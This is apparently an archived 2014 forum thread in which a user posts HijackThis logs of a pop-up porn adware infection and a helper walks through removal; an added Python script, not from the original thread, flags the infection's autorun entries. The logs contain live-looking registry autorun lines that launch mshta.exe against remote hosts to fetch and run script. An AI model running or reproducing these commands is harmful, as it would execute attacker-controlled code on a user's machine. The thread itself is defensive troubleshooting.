View full version: Computer keeps popping up ads, PLZ HELP (HijackThis log attached)

nick888 2014-12-12 02:26 PM

Computer keeps popping up ads, PLZ HELP (HijackThis log attached)

As soon as the computer starts, a Japanese porn ad pops up.
C:\Program Files (x86)\Garena Plus\ggdllhost.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Garena Plus\bbtalk\BBtalk.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Users\User\Desktop\HijackThis.exe
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live 登入小幫手 - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [FUFAXSTM] "C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe"
O4 - HKLM\..\Run: [EEventManager] C:\PROGRA~2\EPSONS~1\EVENTM~1\EEventManager.exe
O4 - HKCU\..\Run: [EPSON ME 650FN Series] C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIFHC.EXE /FU "C:\Windows\TEMP\E_SD854.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU\..\Run: [SystemBootBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://fpb.pluhgtaw.org/reg2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi&log=1]http://fpb.pluhgtaw.org/reg2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi&log=1[/url]
O4 - HKCU\..\Run: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi]http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi[/url]
O4 - HKCU\..\RunOnce: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi]http://fpb.pluhgtaw.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi[/url]
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O8 - Extra context menu item: 匯出至 Microsoft Excel(&X) - res://C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~2\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: [url=http://*.update.microsoft.com]http://*.update.microsoft.com[/url]
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - [url=http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab]http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab[/url]
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Baidu Updater (BaiduUpdater) - Baidu.com, Inc. - C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google更新 服務 (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google更新 服務 (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared Files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

andrew412345 2014-12-12 03:28 PM

My guess at your situation:
1. Shortly after boot a porn ad window appears. It basically says you have already joined as a member and must pay; there is an eye-catching photo and a countdown timer window.
2. The window title will be "welcome!!" or "ero tube" or some other title.
3. You open Task Manager and end it, and a moment later it comes back.

How to check:

1. Start -> Run -> msconfig
2. On the Startup tab, widen the Command column and scroll down; if you find an entry that starts with mshta:, that is almost certainly it.
3. It usually looks like mshta:c:\programdata\XXXX\XXXXX.hta, where XXXXX is a random string of letters. (Write it down.)

How to fix:
1. Open Task Manager (Ctrl+Alt+Del); in Processes there is an mshta.exe, right-click it -> End Process Tree, confirm.
2. Go to c:\programdata\XXXX (XXXXX is the random string of letters; ProgramData is a hidden folder, so show hidden folders first).
3. Inside there will be a bg.jpg; take a look, it should be that nosebleed-inducing beauty picture. BINGO!!
4. Delete the whole folder (Shift+Del).
5. Run msconfig and untick the entry starting with mshta under Startup.
6. Reboot.
7. Class dismissed, bathroom break.


How to show hidden folders:
[url]http://www.synnex.com.tw/asp/fae_qaDetail.asp?from_prg=&topic=FAE&group=&parent=&classifyid=01536&seqno=20672[/url]

nick888 2014-12-12 04:26 PM

Reply to post #2

I followed the instructions but it still pops up, what now :(

andrew412345 2014-12-12 04:30 PM

After deleting c:\programdata\XXXX (XXXXX)

and running msconfig and unticking the entry starting with mshta under Startup,

the problem still persists?


Scan again with HijackThis and POST the LOG.

nick888 2014-12-12 04:37 PM

Reply to post #4

C:\Program Files (x86)\Garena Plus\ggdllhost.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
D:\tt player\TTPlayer.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Garena Plus\bbtalk\BBtalk.exe
C:\Windows\SysWOW64\rundll32.exe
D:\LOL\TW\GameData\Apps\LoLTW\LoL.exe
D:\LOL\TW\GameData\Apps\LoLTW\Air\LOLClient.exe
C:\Users\User\Desktop\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live 登入小幫手 - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [FUFAXSTM] "C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe"
O4 - HKLM\..\Run: [EEventManager] C:\PROGRA~2\EPSONS~1\EVENTM~1\EEventManager.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [QuickDTV] C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuickDTV.exe
O4 - HKLM\..\Run: [ArcSoft Connection Service] C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
O4 - HKCU\..\Run: [EPSON ME 650FN Series] C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIFHC.EXE /FU "C:\Windows\TEMP\E_SD854.tmp" /EF "HKCU"
O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\RunOnce: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://dvc.qftazgyd.org/set_inf2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi]http://dvc.qftazgyd.org/set_inf2 ... 5ewPOfJVnYzXK7ZYjMi[/url]
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O4 - Global Startup: TMMonitor.lnk = C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TMMonitor.exe
O8 - Extra context menu item: 匯出至 Microsoft Excel(&X) - res://C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~2\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - [url=http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab]http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab[/url]
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Baidu Updater (BaiduUpdater) - Baidu.com, Inc. - C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google更新 服務 (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google更新 服務 (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared Files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

[[i] This post was last edited by nick888 on 2014-12-12 04:43 PM [/i]]

andrew412345 2014-12-12 05:03 PM

1. Start - type "Task Scheduler", click "Task Scheduler Library"
2. Find the tasks with gibberish names (some hide under the name systemboot)
Right-click - Properties - Actions, and check whether it points to system32/mshta.exe [img]http://ichbhk.com/ts.png[/img] then click Triggers to confirm whether it repeats every few minutes or seconds
Once confirmed, right-click - Delete
3. Start - type msconfig, on the "Startup" tab find mshta and untick it
4. Start - type regedit
HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Shared Tools -> MSConfig -> startupreg, find the one to delete and remove the whole key

5. Open HijackThis: on the main screen choose [Do a system scan only]; if this shows up again:
O4 - HKCU\..\RunOnce: [RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url=http://dvc.qftazgyd.org]http://dvc.qftazgyd.org[/url]
or a similar entry (one with mshta.exe), tick it and press [Fix checked]
Then:

[u][color=red]Step 1: Download and run ComboFix[/color][/u]

[list][*]First close all antivirus software, then download [url=http://download.bleepingcomputer.com/sUBs/ComboFix.exe]ComboFix[/url] to the desktop[*]Run [color=blue]ComboFix[/color]; [color=blue]ComboFix[/color] will pop up a window, press [color=darkgreen]OK[/color], then press [color=darkgreen]Yes[/color][*][color=blue]ComboFix[/color] will scan; during the scan do not run other programs or click the [color=blue]ComboFix[/color] window[*]After the scan, [color=blue]ComboFix[/color] may restart the computer, after which the [color=blue]ComboFix[/color] report will pop up automatically[*]The report is saved automatically as [color=red]C:\ComboFix.txt[/color][/list]

[u][color=red]Step 2: Briefly describe the situation and paste the reports[/color][/u]

[list][*]Please briefly describe the state of your computer[*]Paste the reports:[list=1][*]HijackThis (a fresh scan LOG taken after ComboFix)[*]ComboFix[/list][/list]

[[i] This post was last edited by andrew412345 on 2014-12-12 05:39 PM [/i]]
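Added example, not code from the thread or from HijackThis: a small Python triage of HijackThis O4 lines that flags the pattern the reply above tells the poster to look for, an HKCU Run/RunOnce value that hands mshta.exe a remote URL or an .hta file, and unwraps the forum's [url=...]...[/url] markup so the full link is analysed even when the display text was truncated. The sample lines are constructed to mirror the thread's log; the hosts, tokens and paths in them are placeholders.

```python
"""Triage of HijackThis O4 autorun lines for the persistence seen in this
thread: an HKCU Run/RunOnce value whose command is mshta.exe followed by a
remote URL or an .hta file. Not part of HijackThis or any tool in the thread."""
import re

# The forum wrapped links as [url=href]display text[/url] and the display text
# was sometimes truncated with "..."; recover the href so we analyse the real
# command line, not the shortened display text.
BB_URL_HREF_RE = re.compile(r"\[url=([^\]]+)\][^\[]*\[/url\]")
BB_URL_PLAIN_RE = re.compile(r"\[url\]([^\[]*)\[/url\]")

# HijackThis O4 line: O4 - <hive>\..\Run: [<value name>] <command line>
O4_RE = re.compile(
    r"^O4 - (?P<hive>HK\S*?)\\\.\.\\(?P<key>Run\w*): \[(?P<name>[^\]]*)\] (?P<cmd>.*)$"
)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)
# The thread's entries were named SystemBoot<token> / RegWrite<token>.
RANDOM_NAME_RE = re.compile(r"^(?:SystemBoot|RegWrite)[A-Za-z0-9]{16,}$")


def unwrap_bbcode(line: str) -> str:
    """Replace [url=...]...[/url] and [url]...[/url] with the bare link."""
    line = BB_URL_HREF_RE.sub(r"\1", line)
    return BB_URL_PLAIN_RE.sub(r"\1", line)


def triage(lines):
    """Return one finding per suspicious O4 Run/RunOnce line.

    severity "high": mshta.exe is handed a URL or an .hta file (the thread's
    pattern); "review": only a weak signal (mshta alone, a URL alone, or a
    random-looking value name).
    """
    findings = []
    for raw in lines:
        m = O4_RE.match(unwrap_bbcode(raw.strip()))
        if not m:
            continue  # not a Run/RunOnce autorun line (e.g. Global Startup)
        name, cmd = m.group("name"), m.group("cmd")
        reasons = []
        mshta = bool(MSHTA_RE.search(cmd))
        if mshta:
            reasons.append("command runs mshta.exe")
        if URL_RE.search(cmd):
            reasons.append("argument is a remote URL")
        if HTA_RE.search(cmd):
            reasons.append("argument is an .hta script")
        remote = bool(URL_RE.search(cmd)) or bool(HTA_RE.search(cmd))
        if RANDOM_NAME_RE.match(name):
            reasons.append("value name is a fixed word plus a random token")
        if not reasons:
            continue
        findings.append({
            "hive": m.group("hive"),
            "key": m.group("key"),
            "name": name,
            "command": cmd,
            "severity": "high" if mshta and remote else "review",
            "reasons": reasons,
        })
    return findings


# Constructed sample lines modelled on the thread's log (placeholder hosts,
# tokens and paths; not the real indicators).
SAMPLE_LINES = [
    r'O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch',
    r"O4 - HKCU\..\Run: [SystemBootAbCdEfGhIjKlMnOpQrStUvWxYz012345] mshta.exe "
    r"[url=http://fpb.example.invalid/reg2.php?cccid=AbCdEfGhIjKlMnOpQrStUvWxYz012345&log=1]"
    r"http://fpb.example.invalid/reg2.php?cccid=AbCdEfGhIjKlMnOpQrStUvWxYz012345&log=1[/url]",
    r"O4 - HKCU\..\RunOnce: [RegWriteAbCdEfGhIjKlMnOpQrStUvWxYz012345] mshta.exe "
    r"[url=http://dvc.example.invalid/set_inf2.php?cccid=AbCdEfGhIjKlMnOpQrStUvWxYz012345]"
    r"http://dvc.example.invalid/set_inf2 ... WxYz012345[/url]",
    r"O4 - HKCU\..\Run: [SystemBootZyXwVuTsRqPoNmLkJiHgFeDcBa543210] mshta.exe C:\ProgramData\kqzr\vtwm.hta",
    r"O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')",
    r"O4 - Global Startup: TMMonitor.lnk = C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TMMonitor.exe",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f['severity']}] {f['hive']}\\..\\{f['key']} [{f['name']}] -> {f['command']}")
        for r in f["reasons"]:
            print("    -", r)
```

The same value names recur in the Task Scheduler library later in the thread, so a hit here is a prompt to check scheduled tasks as well, not just the Run keys.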

nick888 2014-12-12 06:00 PM

Reply to post #6

That window is still there, but now it is completely blank.

HIJACKTHIS
C:\Program Files (x86)\Garena Plus\ggdllhost.exe
C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe
C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Garena Plus\bbtalk\BBtalk.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Users\User\Desktop\HijackThis.exe

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live 登入小幫手 - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [FUFAXSTM] "C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe"
O4 - HKLM\..\Run: [EEventManager] C:\PROGRA~2\EPSONS~1\EVENTM~1\EEventManager.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKCU\..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU\..\Run: [SystemBootBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi] mshta.exe [url]http://imn.qftazgyd.org/reg2.php?cccid=BkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi&log=1[/url]
